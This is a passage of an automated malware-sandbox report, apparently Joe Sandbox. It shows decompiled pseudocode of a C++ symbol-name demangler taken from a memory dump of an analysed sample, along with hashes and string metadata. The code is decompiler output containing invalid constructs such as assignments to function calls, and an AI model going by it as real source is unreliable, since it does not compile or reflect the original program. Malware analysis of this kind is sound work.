                      						if(_v28 > 0x1c) {
                      							L45:
                      							if(E0096A560(_a8) == 0) {
                      								E0095FD40( &_v12, E0095FAD0( &_v356, 0x20, _a8));
                      							}
                      							E0095F240(_a4,  &_v12);
                      							return _a4;
                      						}
                      						_t318 = _v28;
                      						_t144 = _t318 + 0x9635fc; // 0x498d02
                      						switch( *((intOrPtr*)(( *_t144 & 0x000000ff) * 4 +  &M009635EC))) {
                      							case 0:
                      								_v260 = E00960060("signed ", 7);
                      								_v256 = __edx;
                      								__ecx =  &_v12;
                      								__edx =  &_v260;
                      								 &_v340 = E0095FAA0( &_v340,  &_v260,  &_v12);
                      								__ecx =  &_v12;
                      								__eax = E0095F820(__ecx, __eax);
                      								goto L45;
                      							case 1:
                      								_v252 = E00960060("unsigned ", 9);
                      								_v248 = _t318;
                      								_t264 = E0095FAA0( &_v332,  &_v252,  &_v12);
                      								_t323 = _t323 + 0x14;
                      								E0095F820( &_v12, _t264);
                      								goto L45;
                      							case 2:
                      								__ecx = _v14 & 0x000000ff;
                      								_v32 = __ecx;
                      								_v32 = _v32 - 0x45;
                      								_v32 = _v32 - 0x45;
                      								__eflags = _v32 - 8;
                      								if(_v32 > 8) {
                      									goto L45;
                      								}
                      								__eax = _v32;
                      								switch( *((intOrPtr*)(_v32 * 4 +  &M0096361C))) {
                      									case 0:
                      										goto L44;
                      									case 1:
                      										goto L45;
                      								}
                      							case 3:
                      								goto L45;
                      						}
                      					}
                      					E0095F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				_t310 = _v24;
                      				_t13 = _t310 + 0x963528; // 0x498d09
                      				switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M009634FC))) {
                      					case 0:
                      						_t269 = E00960060("char", 4);
                      						_t323 = _t321 + 8;
                      						_v68 = _t269;
                      						_v64 = _t310;
                      						E0095F7E0( &_v12,  &_v68);
                      						goto L37;
                      					case 1:
                      						_v76 = E00960060("short", 5);
                      						_v72 = __edx;
                      						__edx =  &_v76;
                      						__ecx =  &_v12;
                      						__eax = E0095F7E0(__ecx,  &_v76);
                      						goto L37;
                      					case 2:
                      						_v84 = E00960060("int", 3);
                      						_v80 = __edx;
                      						__eax =  &_v84;
                      						__ecx =  &_v12;
                      						__eax = E0095F7E0(__ecx,  &_v84);
                      						goto L37;
                      					case 3:
                      						_v92 = E00960060("long", 4);
                      						_v88 = __edx;
                      						__ecx =  &_v92;
                      						__ecx =  &_v12;
                      						__eax = E0095F7E0(__ecx,  &_v92);
                      						goto L37;
                      					case 4:
                      						_v100 = E00960060("float", 5);
                      						_v96 = __edx;
                      						__edx =  &_v100;
                      						__ecx =  &_v12;
                      						__eax = E0095F7E0(__ecx,  &_v100);
                      						goto L37;
                      					case 5:
                      						L9:
                      						_v116 = E00960060("double", 6);
                      						_v112 = __edx;
                      						__ecx =  &_v116;
                      						__ecx =  &_v12;
                      						__eax = E0095FCA0(__ecx,  &_v116);
                      						goto L37;
                      					case 6:
                      						_v108 = E00960060("long ", 5);
                      						_v104 = __edx;
                      						__eax =  &_v108;
                      						__ecx =  &_v12;
                      						__eax = E0095F7E0( &_v12,  &_v108);
                      						goto L9;
                      					case 7:
                      						_v13 & 0x000000ff = _v13 & 3;
                      						_v20 = _v13 & 3;
                      						goto L37;
                      					case 8:
                      						_v244 = E00960060("void", 4);
                      						_v240 = __edx;
                      						__edx =  &_v244;
                      						__ecx =  &_v12;
                      						__eax = E0095F7E0(__ecx,  &_v244);
                      						goto L37;
                      					case 9:
                      						__eax =  *0xb30640;
                      						_v16 =  *( *0xb30640);
                      						 *0xb30640 =  *0xb30640 + 1;
                      						 *0xb30640 =  *0xb30640 + 1;
                      						_v14 = _v16;
                      						__ecx = _v14 & 0x000000ff;
                      						_v36 = __ecx;
                      						__eflags = _v36 - 0x59;
                      						if(_v36 > 0x59) {
                      							L32:
                      							_v236 = E00960060("UNKNOWN", 7);
                      							_v232 = __edx;
                      							__ecx =  &_v236;
                      							__ecx =  &_v12;
                      							__eax = E0095F7E0(__ecx,  &_v236);
                      							L33:
                      							goto L37;
                      						}
                      						__edx = _v36;
                      						__eax =  *(_v36 + 0x963590) & 0x000000ff;
                      						switch( *((intOrPtr*)(( *(_v36 + 0x963590) & 0x000000ff) * 4 +  &M00963548))) {
                      							case 0:
                      								 *0xb30640 =  *0xb30640 - 1;
                      								 *0xb30640 =  *0xb30640 - 1;
                      								__ecx =  &_v12;
                      								__eax = E0095F920(__ecx, 1);
                      								goto L33;
                      							case 1:
                      								_v228 = E00960060("__w64 ", 6);
                      								_v224 = __edx;
                      								__edx = _a8;
                      								 &_v316 = E00962CD0( &_v316, _a8);
                      								__ecx =  &_v228;
                      								__edx = _a4;
                      								__eax = _a4;
                      								return _a4;
                      							case 2:
                      								_v132 = E00960060("__int8", 6);
                      								_v128 = __edx;
                      								__edx =  &_v132;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v132);
                      								goto L33;
                      							case 3:
                      								_v140 = E00960060("__int16", 7);
                      								_v136 = __edx;
                      								__eax =  &_v140;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v140);
                      								goto L33;
                      							case 4:
                      								_v148 = E00960060("__int32", 7);
                      								_v144 = __edx;
                      								__ecx =  &_v148;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v148);
                      								goto L33;
                      							case 5:
                      								_v156 = E00960060("__int64", 7);
                      								_v152 = __edx;
                      								__edx =  &_v156;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v156);
                      								goto L33;
                      							case 6:
                      								_v164 = E00960060("__int128", 8);
                      								_v160 = __edx;
                      								__eax =  &_v164;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v164);
                      								goto L33;
                      							case 7:
                      								_v124 = E00960060("bool", 4);
                      								_v120 = __edx;
                      								__ecx =  &_v124;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v124);
                      								goto L33;
                      							case 8:
                      								_v20 = 0xfffffffe;
                      								goto L33;
                      							case 9:
                      								_v212 = E00960060("auto", 4);
                      								_v208 = __edx;
                      								__eax =  &_v212;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v212);
                      								goto L33;
                      							case 0xa:
                      								_v180 = E00960060("char8_t", 7);
                      								_v176 = __edx;
                      								__edx =  &_v180;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v180);
                      								goto L33;
                      							case 0xb:
                      								_v172 = E00960060("<unknown>", 9);
                      								_v168 = __edx;
                      								__ecx =  &_v172;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v172);
                      								goto L33;
                      							case 0xc:
                      								_v188 = E00960060("char16_t", 8);
                      								_v184 = __edx;
                      								__eax =  &_v188;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v188);
                      								goto L33;
                      							case 0xd:
                      								_v220 = E00960060("decltype(auto)", 0xe);
                      								_v216 = __edx;
                      								__ecx =  &_v220;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v220);
                      								goto L33;
                      							case 0xe:
                      								_v196 = E00960060("char32_t", 8);
                      								_v192 = __edx;
                      								__ecx =  &_v196;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v196);
                      								goto L33;
                      							case 0xf:
                      								_v204 = E00960060("wchar_t", 7);
                      								_v200 = __edx;
                      								__edx =  &_v204;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0(__ecx,  &_v204);
                      								goto L33;
                      							case 0x10:
                      								__edx =  *0xb30640;
                      								__edx =  *0xb30640 - 1;
                      								 *0xb30640 = __edx;
                      								 &_v308 = E00964C20(__edx,  &_v308);
                      								__ecx =  &_v12;
                      								__eax = E0095F820( &_v12, __eax);
                      								__ecx =  &_v12;
                      								__eax = E0096A560(__ecx);
                      								__eflags = __eax;
                      								if(__eax != 0) {
                      									__ecx =  &_v12;
                      									__ecx = _a4;
                      									E0095F240(_a4,  &_v12) = _a4;
                      									return _a4;
                      								}
                      								goto L33;
                      							case 0x11:
                      								goto L32;
                      						}
                      					case 0xa:
                      						goto L35;
                      				}
                      			}


                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
                      • String ID: volatile$char$const$double$float$int$long$long $short$signed $unsigned $volatile
                      • API String ID: 2623725463-1006727529
                      • Opcode ID: 2ac9fee540ff52833f9d17890e99ee12b926475ad5353a4b82855847a2ef3dba
                      • Instruction ID: 1be7e9f67a5acd57c83968944b0eeaf3acf83d4c91b3104dade9ce04ed908eea
                      • Opcode Fuzzy Hash: 2ac9fee540ff52833f9d17890e99ee12b926475ad5353a4b82855847a2ef3dba
                      • Instruction Fuzzy Hash: D9D171B5C44208ABCB15EFA4DC52BEEBB74AF94311F04816AE51A6B281EB705748CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 99%
                      			E00965E80(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
                      				char _v12;
                      				signed int _v13;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				char _v36;
                      				char _v44;
                      				intOrPtr _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				char _v68;
                      				char _v76;
                      				intOrPtr _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				signed int _v96;
                      				signed int _v100;
                      				signed int _v104;
                      				signed int _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				signed int _v124;
                      				signed int _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				signed int _v156;
                      				char _v160;
                      				char _v168;
                      				signed int _v172;
                      				char _v176;
                      				char _v184;
                      				char _v192;
                      				char _v200;
                      				char _v208;
                      				char _v216;
                      				char _v224;
                      				char _v232;
                      				char _v240;
                      				char _v248;
                      				char _v256;
                      				char _v264;
                      				char _v272;
                      				char _v280;
                      				char _v288;
                      				char _v296;
                      				char _v304;
                      				char _v312;
                      				char _v320;
                      				char _v328;
                      				signed int _t256;
                      				signed int _t271;
                      
                      				E0095F3F0( &_v12);
                      				E0095F3F0( &_v36);
                      				_v60 = 0;
                      				_v20 = 0;
                      				_t256 =  *0xb30640; // 0x0
                      				_v80 =  *_t256;
                      				_t271 =  *0xb30640; // 0x0
                      				 *0xb30640 = _t271 + 1;
                      				_v48 = _v80;
                      				if(_v48 > 0x5f) {
                      					L73:
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t10 = _v48 + 0x966840; // 0x9660c905
                      				switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M00966824))) {
                      					case 0:
                      						 *0xb30640 =  *0xb30640 - 1;
                      						E0095F350(_a4, 1);
                      						return _a4;
                      					case 1:
                      						_t15 =  &_v44; // -39
                      						__ecx = _t15;
                      						__eax = E0095F3F0(_t15);
                      						__ecx = _a8 & 0x000000ff;
                      						__eflags = _a8 & 0x000000ff;
                      						if(__eflags == 0) {
                      							L11:
                      							__ecx =  *0xb30640; // 0x0
                      							_v84 = __ecx;
                      							_t29 =  &_v208; // -203
                      							__edx = _t29;
                      							__eax = E0096A1E0(__ebx, __edi, __esi, _t29, 0, 0);
                      							_t30 =  &_v12; // -7
                      							__ecx = _t30;
                      							__eax = _v84;
                      							 *0xb30640 = _v84;
                      							_t32 =  &_v12; // -7
                      							__ecx = _t32;
                      							__eax = E0096A560(_t32);
                      							__eflags = __eax;
                      							if(__eax == 0) {
                      								__ecx = 1;
                      								__edx = 0xffffffffffffffff;
                      								__eax =  *0xb30640; // 0x0
                      								__ecx =  *(__eax + 0xffffffffffffffff);
                      								__eflags =  *(__eax + 0xffffffffffffffff) - 0x31;
                      								if( *(__eax + 0xffffffffffffffff) == 0x31) {
                      									_t34 =  &_v12; // -7
                      									__edx = _t34;
                      									_t35 =  &_v216; // -211
                      									_t35 = E0095FAD0(_t35, 0x7e, _t34);
                      									_t36 =  &_v12; // -7
                      									__ecx = _t36;
                      									__eax = E0095F820(_t36, __eax);
                      								}
                      							}
                      							_t37 =  &_v44; // -39
                      							__ecx = _t37;
                      							__eax = E0096A560(_t37);
                      							__eflags = __eax;
                      							if(__eax == 0) {
                      								_t38 =  &_v44; // -39
                      								__ecx = _t38;
                      								_t39 =  &_v12; // -7
                      								__ecx = _t39;
                      								__eax = E0095FD40(_t39, _t38);
                      							}
                      							_t40 =  &_v12; // -7
                      							__edx = _t40;
                      							__ecx = _a4;
                      							E0095F240(_a4, _t40) = _a4;
                      							return _a4;
                      						}
                      						_t17 =  &_v192; // -187
                      						__edx = _t17;
                      						__eax = E00968210(__ebx, __edi, __esi, __eflags, _t17);
                      						_t18 =  &_v200; // -195
                      						_t18 = E0095FAD0(_t18, 0x3c, _t18);
                      						_t19 =  &_v44; // -39
                      						__ecx = _t19;
                      						__eax = E0095FD40(_t19, __eax);
                      						_t20 =  &_v44; // -39
                      						__ecx = _t20;
                      						__eax = E00965990(_t20);
                      						__ecx = __al;
                      						__eflags = __al - 0x3e;
                      						if(__al == 0x3e) {
                      							_t21 =  &_v44; // -39
                      							__ecx = _t21;
                      							__eax = E0095FDE0(_t21, 0x20);
                      						}
                      						_t22 =  &_v44; // -39
                      						__ecx = _t22;
                      						__eax = E0095FDE0(_t22, 0x3e);
                      						__eflags = _a12;
                      						if(_a12 != 0) {
                      							__edx = _a12;
                      							 *_a12 = 1;
                      						}
                      						__eax =  *0xb30640; // 0x0
                      						__ecx =  *__eax;
                      						__eflags =  *__eax;
                      						if( *__eax != 0) {
                      							__eax =  *0xb30640; // 0x0
                      							__eax = __eax + 1;
                      							__eflags = __eax;
                      							 *0xb30640 = __eax;
                      							goto L11;
                      						} else {
                      							_t25 =  &_v44; // -39
                      							__edx = _t25;
                      							__ecx = _a4;
                      							E0095F240(_a4, _t25) = _a4;
                      							return _a4;
                      						}
                      					case 2:
                      						__eax = 1;
                      						__ecx = 0xffffffffffffffff;
                      						__edx =  *0xb30640; // 0x0
                      						__eax =  *(__edx + 0xffffffffffffffff);
                      						__ecx =  *(__edx + 0xffffffffffffffff) * 8 +  &M009D8838;
                      						_t46 =  &_v12; // -7
                      						__ecx = _t46;
                      						__eax = E0095F7E0(_t46,  *(__edx + 0xffffffffffffffff) * 8 +  &M009D8838);
                      						goto L74;
                      					case 3:
                      						L19:
                      						__edx = 1;
                      						__eax = 0xffffffffffffffff;
                      						__ecx =  *0xb30640; // 0x0
                      						__edx =  *(_t51 + 0xffffffffffffffff);
                      						__eax =  *(_t51 + 0xffffffffffffffff) * 8 +  &M009D8800;
                      						_t51 =  &_v12; // -7
                      						__ecx = _t51;
                      						__eax = E0095F7E0(_t51,  *(_t51 + 0xffffffffffffffff) * 8 +  &M009D8800);
                      						goto L74;
                      					case 4:
                      						_v60 = 1;
                      						goto L19;
                      					case 5:
                      						__ecx =  *0xb30640;
                      						__edx =  *( *0xb30640);
                      						_v88 =  *( *0xb30640);
                      						__eax =  *0xb30640; // 0x0
                      						 *0xb30640 = __eax;
                      						__ecx = _v88;
                      						_v52 = _v88;
                      						__eflags = _v52 - 0x5f;
                      						if(_v52 > 0x5f) {
                      							L71:
                      							__ecx = _a4;
                      							E0095F350(_a4, 2) = _a4;
                      							return _a4;
                      						}
                      						__edx = _v52;
                      						__eax =  *(_v52 + 0x9668d4) & 0x000000ff;
                      						switch( *((intOrPtr*)(( *(_v52 + 0x9668d4) & 0x000000ff) * 4 +  &M009668A0))) {
                      							case 0:
                      								 *0xb30640 =  *0xb30640 - 1;
                      								 *0xb30640 =  *0xb30640 - 1;
                      								__ecx = _a4;
                      								E0095F350(_a4, 1) = _a4;
                      								return _a4;
                      							case 1:
                      								__edx = 1;
                      								__eax = 0xffffffffffffffff;
                      								__ecx =  *0xb30640; // 0x0
                      								__edx =  *(_t65 + 0xffffffffffffffff);
                      								__eax = 0x9d8958 +  *(_t65 + 0xffffffffffffffff) * 8;
                      								_t65 =  &_v12; // -7
                      								__ecx = _t65;
                      								__eax = E0095F7E0(_t65, 0x9d8958 +  *(_t65 + 0xffffffffffffffff) * 8);
                      								goto L72;
                      							case 2:
                      								__ecx = 1;
                      								__edx = 0xffffffffffffffff;
                      								__eax =  *0xb30640; // 0x0
                      								__ecx =  *(__eax + 0xffffffffffffffff);
                      								__edx = 0x9d8958 +  *(__eax + 0xffffffffffffffff) * 8;
                      								__ecx = _a4;
                      								__eax = _a4;
                      								return _a4;
                      							case 3:
                      								__eax = 1;
                      								__ecx = 0xffffffffffffffff;
                      								__edx =  *0xb30640; // 0x0
                      								__eax =  *(__edx + 0xffffffffffffffff);
                      								__ecx = 0x9d8958 +  *(__edx + 0xffffffffffffffff) * 8;
                      								_t74 =  &_v136; // -131
                      								__ecx = _t74;
                      								__eax = E0095F1F0(_t74, 0x9d8958 +  *(__edx + 0xffffffffffffffff) * 8);
                      								_t75 =  &_v136; // -131
                      								__ecx = _t75;
                      								__eax = E0096AB30(_t75);
                      								_t76 =  &_v136; // -131
                      								__edx = _t76;
                      								__ecx = _a4;
                      								E0095F240(_a4, _t76) = _a4;
                      								return _a4;
                      							case 4:
                      								__edx =  *0xb30640;
                      								__eax =  *( *0xb30640);
                      								_v120 =  *( *0xb30640);
                      								 *0xb30640 =  *0xb30640 + 1;
                      								 *0xb30640 =  *0xb30640 + 1;
                      								__edx = _v120;
                      								_v56 = _v120;
                      								__eflags = _v56;
                      								if(_v56 == 0) {
                      									 *0xb30640 =  *0xb30640 - 1;
                      									 *0xb30640 =  *0xb30640 - 1;
                      									__ecx = _a4;
                      									E0095F350(_a4, 1) = _a4;
                      									return _a4;
                      								}
                      								__eflags = _v56 - 0x30;
                      								if(_v56 == 0x30) {
                      									_push(0);
                      									__ecx =  &_v152;
                      									__eax = E00967F80(__ebx, __edi, __esi,  &_v152, 1);
                      									__ecx =  &_v152;
                      									__eax = E0096AAC0( &_v152);
                      									__edx =  &_v152;
                      									__ecx = _a4;
                      									E0095F240(_a4,  &_v152) = _a4;
                      									return _a4;
                      								}
                      								__ecx = _a4;
                      								E0095F350(_a4, 2) = _a4;
                      								return _a4;
                      							case 5:
                      								__edx = 1;
                      								__eax = 0xffffffffffffffff;
                      								__ecx =  *0xb30640;
                      								__edx =  *( *0xb30640 + 0xffffffffffffffff);
                      								__eax = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      								__ecx = _a4;
                      								E0095F1F0(_a4, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8) = _a4;
                      								return _a4;
                      							case 6:
                      								_push(1);
                      								 &_v144 = E00967F80(__ebx, __edi, __esi,  &_v144, 0);
                      								__ecx =  &_v144;
                      								__eax = E0096AAC0( &_v144);
                      								__ecx =  &_v144;
                      								__ecx = _a4;
                      								E0095F240(_a4,  &_v144) = _a4;
                      								return _a4;
                      							case 7:
                      								__ecx = 1;
                      								__edx = 0xffffffffffffffff;
                      								__eax =  *0xb30640;
                      								__ecx =  *( *0xb30640 + 0xffffffffffffffff);
                      								__edx = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      								__ecx =  &_v12;
                      								E0095F7E0( &_v12, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8) =  &_v224;
                      								__eax = E00965E80(__ebx, __edi, __esi,  &_v224, 0, 0);
                      								__ecx =  &_v36;
                      								__eax = E0095F820( &_v36, __eax);
                      								__ecx =  &_v36;
                      								__eax = E0096A560( &_v36);
                      								__eflags = __eax;
                      								if(__eax != 0) {
                      									L31:
                      									__ecx =  &_v36;
                      									__edx = _a4;
                      									__ecx =  &_v12;
                      									E0095FB70( &_v12, _a4,  &_v36) = _a4;
                      									return _a4;
                      								}
                      								__ecx =  &_v36;
                      								__eax = E0096A660( &_v36);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									goto L31;
                      								}
                      								__ecx = _a4;
                      								E0095F350(_a4, 2) = _a4;
                      								return _a4;
                      							case 8:
                      								goto L72;
                      							case 9:
                      								__eax = 1;
                      								__ecx = 0xffffffffffffffff;
                      								__edx =  *0xb30640;
                      								__eax =  *( *0xb30640 + 0xffffffffffffffff);
                      								__ecx = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0( &_v12, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
                      								__edx = 1;
                      								__eax = 0;
                      								__ecx =  *0xb30640;
                      								__edx =  *__ecx;
                      								__eflags =  *__ecx;
                      								if( *__ecx != 0) {
                      									__ecx = 1;
                      									__edx = 0;
                      									__eax =  *0xb30640;
                      									__ecx =  *__eax;
                      									__ecx =  *__eax - 0x30;
                      									__eflags = __ecx;
                      									_v20 = __ecx;
                      									if(__ecx < 0) {
                      										L37:
                      										__ecx = _a4;
                      										E0095F350(_a4, 2) = _a4;
                      										return _a4;
                      									}
                      									__eflags = _v20 - 5;
                      									if(_v20 < 5) {
                      										__edx = _v20;
                      										__eax = 0x9d8c60 + _v20 * 8;
                      										__ecx =  &_v36;
                      										__eax = E0095F7E0( &_v36, 0x9d8c60 + _v20 * 8);
                      										__ecx =  *0xb30640;
                      										__edx =  *( *0xb30640);
                      										_v92 =  *( *0xb30640);
                      										 *0xb30640 =  *0xb30640 + 1;
                      										 *0xb30640 =  *0xb30640 + 1;
                      										__ecx = _v92;
                      										_v24 = _v92;
                      										_v24 = _v24 - 0x30;
                      										_v24 = _v24 - 0x30;
                      										__eflags = _v24 - 4;
                      										if(__eflags > 0) {
                      											 *0xb30640 =  *0xb30640 - 1;
                      											 *0xb30640 =  *0xb30640 - 1;
                      											__ecx = _a4;
                      											E0095F350(_a4, 1) = _a4;
                      											return _a4;
                      										}
                      										__eax = _v24;
                      										switch( *((intOrPtr*)(_v24 * 4 +  &M00966934))) {
                      											case 0:
                      												__ecx =  &_v184;
                      												__eax = E00964380(__ebx, __edi, __esi, __eflags,  &_v184, 0);
                      												__edx =  &_v232;
                      												__ecx =  &_v184;
                      												_v96 = E0095FBB0( &_v184,  &_v232, 0x20);
                      												__eax =  &_v12;
                      												__ecx =  &_v240;
                      												__ecx = _v96;
                      												_v100 = E0095FB70(_v96,  &_v240,  &_v12);
                      												__edx =  &_v36;
                      												__eax = _a4;
                      												__ecx = _v100;
                      												E0095FB70(_v100, _a4,  &_v36) = _a4;
                      												return _a4;
                      											case 1:
                      												__ecx =  &_v36;
                      												__edx =  &_v68;
                      												__ecx =  &_v12;
                      												E0095FB70( &_v12,  &_v68,  &_v36) =  &_v248;
                      												_v104 = E00967C80(__ebx, __edi, __esi,  &_v248);
                      												__ecx =  &_v256;
                      												__ecx = _v104;
                      												__eax = E0095FBB0(_v104,  &_v256, 0x2c);
                      												__ecx =  &_v68;
                      												__eax = E0095FD40( &_v68, __eax);
                      												__edx =  &_v264;
                      												_v108 = E00967C80(__ebx, __edi, __esi,  &_v264);
                      												__eax =  &_v272;
                      												__ecx = _v108;
                      												__eax = E0095FBB0(_v108,  &_v272, 0x2c);
                      												__ecx =  &_v68;
                      												__eax = E0095FD40( &_v68, __eax);
                      												__ecx =  &_v280;
                      												_v112 = E00967C80(__ebx, __edi, __esi,  &_v280);
                      												__edx =  &_v288;
                      												__ecx = _v112;
                      												__eax = E0095FBB0(_v112,  &_v288, 0x2c);
                      												__ecx =  &_v68;
                      												__eax =  &_v296;
                      												_v116 = E00964900(__ebx, __edi, __esi,  &_v296, 0);
                      												__ecx =  &_v304;
                      												__ecx = _v116;
                      												__eax = E0095FBB0(_v116,  &_v304, 0x29);
                      												__ecx =  &_v68;
                      												__eax = E0095FD40( &_v68, __eax);
                      												__edx = _a4;
                      												__ecx =  &_v68;
                      												E0095FBB0( &_v68, _a4, 0x27) = _a4;
                      												return _a4;
                      											case 2:
                      												__eax =  &_v36;
                      												__ecx = _a4;
                      												__ecx =  &_v12;
                      												E0095FB70( &_v12, _a4,  &_v36) = _a4;
                      												return _a4;
                      										}
                      									}
                      									goto L37;
                      								}
                      								__eax = _a4;
                      								__ecx =  &_v12;
                      								E0095FC30( &_v12, _a4, 1) = _a4;
                      								return _a4;
                      							case 0xa:
                      								__eax = 1;
                      								__ecx = 0xffffffffffffffff;
                      								__edx =  *0xb30640;
                      								__eax =  *( *0xb30640 + 0xffffffffffffffff);
                      								__ecx = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      								__ecx =  &_v12;
                      								__eax = E0095F7E0( &_v12, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
                      								L72:
                      								L74:
                      								__eflags = _v60;
                      								if(_v60 == 0) {
                      									_t244 =  &_v12; // -7
                      									__ecx = _t244;
                      									__eax = E0096A560(_t244);
                      									__eflags = __eax;
                      									if(__eax == 0) {
                      										_v176 = E00960060("operator", 8);
                      										_v172 = __edx;
                      										_t247 =  &_v12; // -7
                      										__ecx = _t247;
                      										_t248 =  &_v176; // -171
                      										__edx = _t248;
                      										_t249 =  &_v328; // -323
                      										_t249 = E0095FAA0(_t249, _t248, _t247);
                      										_t250 =  &_v12; // -7
                      										__ecx = _t250;
                      										__eax = E0095F820(_t250, __eax);
                      									}
                      								} else {
                      									_t243 =  &_v12; // -7
                      									__ecx = _t243;
                      									__eax = E0096AB00(_t243);
                      								}
                      								_t251 =  &_v12; // -7
                      								__ecx = _t251;
                      								__ecx = _a4;
                      								E0095F240(_a4, _t251) = _a4;
                      								return _a4;
                      							case 0xb:
                      								__eax =  *0xb30640;
                      								__ecx =  *( *0xb30640);
                      								_v128 =  *( *0xb30640);
                      								 *0xb30640 =  *0xb30640 + 1;
                      								 *0xb30640 =  *0xb30640 + 1;
                      								__eax = _v128;
                      								_v28 = _v128;
                      								_v28 = _v28 - 0x41;
                      								_v28 = _v28 - 0x41;
                      								__eflags = _v28 - 0xd;
                      								if(_v28 > 0xd) {
                      									__ecx = _a4;
                      									E0095F350(_a4, 2) = _a4;
                      									return _a4;
                      								}
                      								__edx = _v28;
                      								switch( *((intOrPtr*)(_v28 * 4 +  &M00966948))) {
                      									case 0:
                      										__eax = 1;
                      										__ecx = 0xffffffffffffffff;
                      										__edx =  *0xb30640;
                      										__eax =  *( *0xb30640 + 0xffffffffffffffff);
                      										__ecx = 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      										__ecx = _a4;
                      										E0095F1F0(_a4, 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8) = _a4;
                      										return _a4;
                      									case 1:
                      										__edx = 1;
                      										__eax = 0xffffffffffffffff;
                      										__ecx =  *0xb30640;
                      										__edx =  *( *0xb30640 + 0xffffffffffffffff);
                      										__eax = 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      										__ecx =  &_v76;
                      										__eax = E0095F1F0( &_v76, 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
                      										__ecx =  *0xb30640;
                      										__edx =  *( *0xb30640);
                      										__eflags =  *( *0xb30640) - 0x3f;
                      										if(__eflags != 0) {
                      											__ecx =  &_v320;
                      											__eax = E00968180( &_v320);
                      											__ecx =  &_v76;
                      											__eax = E0095FD40( &_v76, __eax);
                      										} else {
                      											 &_v312 = E009644C0(__ebx, __edi, __esi, __eflags,  &_v312);
                      											__ecx =  &_v76;
                      											__eax = E0095FD40( &_v76, __eax);
                      											__ecx =  *0xb30640;
                      											__edx =  *( *0xb30640);
                      											__eflags =  *( *0xb30640) - 0x40;
                      											if( *( *0xb30640) == 0x40) {
                      												__eax =  *0xb30640;
                      												__eax =  *0xb30640 + 1;
                      												__eflags = __eax;
                      												 *0xb30640 = __eax;
                      											}
                      										}
                      										_v160 = E00960060("\'\'", 2);
                      										_v156 = __edx;
                      										__edx =  &_v160;
                      										__ecx =  &_v76;
                      										E0095FCA0( &_v76,  &_v160) =  &_v76;
                      										__ecx = _a4;
                      										E0095F240(_a4,  &_v76) = _a4;
                      										return _a4;
                      									case 2:
                      										__ecx = 1;
                      										__edx = 0xffffffffffffffff;
                      										__eflags = 0xffffffffffffffff;
                      										__eax =  *0xb30640;
                      										__ecx =  *( *0xb30640 + 0xffffffffffffffff);
                      										__edx = 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
                      										__ecx =  &_v168;
                      										__eax = E0095F1F0( &_v168, 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
                      										while(1) {
                      											__eax =  *0xb30640;
                      											__ecx =  *( *0xb30640);
                      											__eflags =  *( *0xb30640);
                      											if( *( *0xb30640) == 0) {
